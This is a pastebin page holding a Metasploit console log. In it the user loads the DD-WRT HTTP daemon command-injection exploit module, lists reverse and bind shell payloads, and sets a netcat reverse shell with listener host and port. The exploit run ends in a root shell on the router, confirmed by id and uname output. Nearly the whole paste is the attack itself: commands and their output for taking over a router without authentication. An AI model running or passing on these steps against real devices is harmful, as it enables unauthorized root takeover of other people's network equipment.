Pastie now auto-senses if line-wrap is a bad or good idea. Feedback?
## mark a section (Learn more)
msf3$ svn up A modules/exploits/windows/smb/netidentity_xtierrpcpipe.rb Updated to revision 6852. hdm@vorpal:/downloads/msf19$ ./msfconsole | | _) | __ `__ \ _ \ __| _` | __| __ \ | _ \ | __| | | | __/ | ( |\__ \ | | | ( | | | _| _| _|\___|\__|\__,_|____/ .__/ _|\___/ _|\__| _| =[ msf v3.3-dev + -- --=[ 401 exploits - 234 payloads + -- --=[ 20 encoders - 7 nops =[ 176 aux msf > use exploit/linux/http/ddwrt_cgibin_exec msf exploit(ddwrt_cgibin_exec) > info Name: DD-WRT HTTP Daemon Arbitrary Command Execution Version: 6852 Platform: Unix Privileged: No License: Metasploit Framework License (BSD) Provided by: hdm <hdm@metasploit.com> Available targets: Id Name -- ---- 0 Automatic Target Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- RHOST 192.168.0.10 yes The target address RPORT 80 yes The target port Payload information: Space: 1024 Description: This module abuses a metacharacter injection vulnerability in the HTTP management server of wireless gateways running DD-WRT. This flaw allows an unauthenticated attacker to execute arbitrary commands as the root user account. References: http://www.securityfocus.com/bid/35742 http://www.milw0rm.com/exploits/9209 msf exploit(ddwrt_cgibin_exec) > show payloads Compatible payloads =================== Name Description ---- ----------- cmd/unix/bind_netcat Unix Command Shell, Bind TCP (via netcat -e) cmd/unix/bind_perl Unix Command Shell, Bind TCP (via perl) cmd/unix/bind_ruby Unix Command Shell, Bind TCP (via Ruby) cmd/unix/generic Unix Command, Generic command execution cmd/unix/reverse Unix Command Shell, Double reverse TCP (telnet) cmd/unix/reverse_bash Unix Command Shell, Reverse TCP (/dev/tcp) cmd/unix/reverse_netcat Unix Command Shell, Reverse TCP (via netcat -e) cmd/unix/reverse_perl Unix Command Shell, Reverse TCP (via perl) cmd/unix/reverse_ruby Unix Command Shell, Reverse TCP (via Ruby) generic/shell_bind_tcp Generic Command Shell, Bind TCP Inline generic/shell_reverse_tcp Generic Command Shell, Reverse TCP Inline msf exploit(ddwrt_cgibin_exec) > set PAYLOAD cmd/unix/reverse_netcat PAYLOAD => cmd/unix/reverse_netcat msf exploit(ddwrt_cgibin_exec) > set LHOST 192.168.0.139 LHOST => 192.168.0.139 msf exploit(ddwrt_cgibin_exec) > set LPORT 4444 LPORT => 4444 msf exploit(ddwrt_cgibin_exec) > set RHOST 192.168.0.10 RHOST => 192.168.0.10 msf exploit(ddwrt_cgibin_exec) > exploit [*] Handler binding to LHOST 0.0.0.0 [*] Started reverse handler [*] Sending GET request with encoded command line... [*] Command shell session 1 opened (192.168.0.139:4444 -> 192.168.0.10:2057) id uid=0(root) gid=0(root) uname -a Linux wifi1 2.4.36 #308 Sun Jul 27 16:11:05 CEST 2008 mips unknown
This paste will be private.
From the Design Piracy series on my blog:
Pastie << self Blog
